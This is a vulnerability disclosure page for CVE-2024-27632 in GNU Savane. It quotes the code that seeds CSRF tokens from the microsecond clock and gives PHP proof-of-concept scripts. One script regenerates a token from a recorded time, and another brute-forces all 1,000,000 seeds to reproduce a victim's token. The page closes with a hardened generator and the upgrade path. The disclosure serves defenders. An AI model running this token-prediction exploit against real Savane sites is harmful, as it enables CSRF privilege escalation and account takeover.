
CVE-2024-27632 PoC — GNU Savane Security Vulnerability

Associated Vulnerability
Title: GNU Savane Security Vulnerability (CVE-2024-27632)
Description: GNU Savane is a collaborative software development management system from the GNU community in the United States. GNU Savane v3.12 and earlier contain a security vulnerability that allows remote attackers to escalate privileges via the form_id in the form_header() function.

Readme
# CVE-2024-27632 Vulnerability Details

## Overview

In Savane v3.12 and prior, the Unix timestamp is used as a seed in the Pseudo-Random Number Generator (PRNG) used to generate Cross-Site Request Forgery (CSRF) protection tokens (`form_id`). As a result, an attacker may be able to independently generate the same valid CSRF token that was assigned to a victim user, thereby passing CSRF checks and leading to a successful CSRF attack. The impact of a CSRF attack includes privilege escalation and account takeover.


**CWE Classification:** CWE-335: Incorrect Usage of Seeds in Pseudo-Random Number Generator (PRNG)

**Reported By:** Ally Petitt 

**Affected Product**: Savane

**Affected Versions**: 3.12 and prior

## Technical Details

Before the `form_id` is generated, `utils_srand()` is called to seed PHP's Mersenne Twister PRNG. The `form_id` is then the MD5 hash of a single `mt_rand()` output in the range 0 to 1,000,000.

_frontend/php/include/form.php:61_
```
  if (!$form_id)
    {
      utils_srand ();
      $form_id = md5 (mt_rand (0, 1000000));
    }
```

As shown in the code block below, `utils_srand()` seeds the PRNG with the value of `microtime()` multiplied by 1,000,000. Note what that cast actually does: `microtime()` called without an argument returns a string of the form `"0.uuuuuu00 ssssssssss"` (fractional seconds, a space, then the Unix timestamp in seconds), and `(double)` keeps only the leading numeric part. The seed that reaches `mt_srand()` is therefore the microsecond fraction of the current second, an integer between 0 and 999,999; the Unix seconds themselves never enter the seed.

_frontend/php/include/utils.php:969_
```
function utils_srand ()
{
  mt_srand ((int)((double)microtime () * 1000000));
}
```

As a result, a value derived from the current time, which is predictable, is used to generate a security-critical pseudo-random number, and since only the fractional part of the time reaches the seed there are at most 1,000,000 possible seeds (and thus at most 1,000,000 possible `form_id` values) regardless of when the token was created. The time at which a user's token was created can potentially be guessed or triggered by an attacker in order to narrow the candidates, and even without timing information the full candidate set can be enumerated offline.

## Validation Steps
These steps aim to demonstrate that knowing the timestamp is enough to generate a valid token independently. A real-world attack may require additional creativity to deduce the correct creation time of the victim's token.

1. Visit a Savane webpage that generates a `form_id`.
2. Note the value `microtime()` returned on the server when that page was generated. Because of the `(double)` cast in `utils_srand()`, only the fractional-second part of that string influences the seed, so the seconds-granularity time at which you visited the page is not enough on its own; in a test deployment the simplest approach is to log the `microtime()` value from `utils_srand()`.
3. Replace `$RECORDED_UNIX_TIME` with the recorded `microtime()` string (quoted, e.g. `"0.41325600 1700000000"`) and run the following PHP script. Observe that the value generated matches the `form_id` that the server returned upon initially visiting the webpage.

```
<?php
// Replace the placeholder with the microtime() string recorded in step 2.
// The (double) cast keeps only the fractional part, exactly as in utils_srand().
mt_srand ((int)((double)$RECORDED_UNIX_TIME * 1000000));
echo md5 (mt_rand (0, 1000000));
?>
```
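The following PHP script is an added example, not code from Savane or from the original PoC, that puts the validation steps above together with the seeding analysis in the Technical Details section. It reproduces the server-side token computation, shows that the Unix seconds never influence the token, exhaustively searches the seed space against a constructed victim token, and contrasts the generator with one based on a CSPRNG. The function names, the sample `microtime()` strings and the hardened generator are all this example's own choices; the hardened generator is a suggested form, not the upstream patch.

```php
<?php
// Added example (not part of Savane or the original PoC). Function names are
// this example's own; the microtime() strings below are constructed samples.

// Server side, as quoted from form.php / utils.php: seed from the microtime()
// string, then hash a single PRNG output.
function savane_form_id_from_microtime(string $microtime): string
{
    mt_srand((int) ((double) $microtime * 1000000));
    return md5((string) mt_rand(0, 1000000));
}

// The same computation with the seed supplied directly, used for enumeration.
function savane_form_id_from_seed(int $seed): string
{
    mt_srand($seed);
    return md5((string) mt_rand(0, 1000000));
}

// Attacker side: try every seed utils_srand() can produce (0..999999).
// The comparison against $target stands in for whatever would tell a real
// attacker that a guess worked; here $target is a constructed victim token so
// the script runs offline. Returns [seed, attempts] or null.
function enumerate_seeds(string $target): ?array
{
    for ($seed = 0; $seed < 1000000; $seed++) {
        if (hash_equals($target, savane_form_id_from_seed($seed))) {
            return [$seed, $seed + 1];
        }
    }
    return null;
}

// Suggested hardened generator (this example's suggestion, not the upstream
// fix): 128 bits from the OS CSPRNG, with no dependence on the clock.
function hardened_form_id(): string
{
    return bin2hex(random_bytes(16));
}

// 1. The Unix seconds are irrelevant: same fraction, different seconds,
//    identical token, because (double)"0.41325600 1700000000" is 0.413256.
$a = savane_form_id_from_microtime("0.41325600 1700000000"); // constructed
$b = savane_form_id_from_microtime("0.41325600 1800000000"); // constructed
printf("same fraction, 100M seconds apart: tokens %s\n", $a === $b ? "identical" : "differ");

// 2. Exhaustive search over the whole seed space finds a seed that reproduces
//    the victim's token; it takes a few seconds on ordinary hardware.
$t0 = microtime(true);
$hit = enumerate_seeds($a);
if ($hit === null) {
    echo "no seed reproduces the token\n";
} else {
    [$seed, $attempts] = $hit;
    printf("seed %d reproduces the token after %d attempts in %.1fs\n",
        $seed, $attempts, microtime(true) - $t0);
}

// 3. A token from the OS CSPRNG has no seed space to enumerate.
printf("hardened token: %s\n", hardened_form_id());
```

Run it with `php` on any 7.1 or later interpreter. Because different seeds can produce the same `mt_rand()` output, the seed reported in step 2 is a seed that yields the token, not necessarily the one the server used; for a CSRF attack only the token matters, so that distinction is irrelevant to the attacker.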


## Mitigation

Upgrade to Savane version 3.13 or higher. The patch can be found [here](https://git.savannah.nongnu.org/cgit/administration/savane.git/commit/?h=i18n&id=dee5195d18f9ab16c860e8114819083673f66b95).


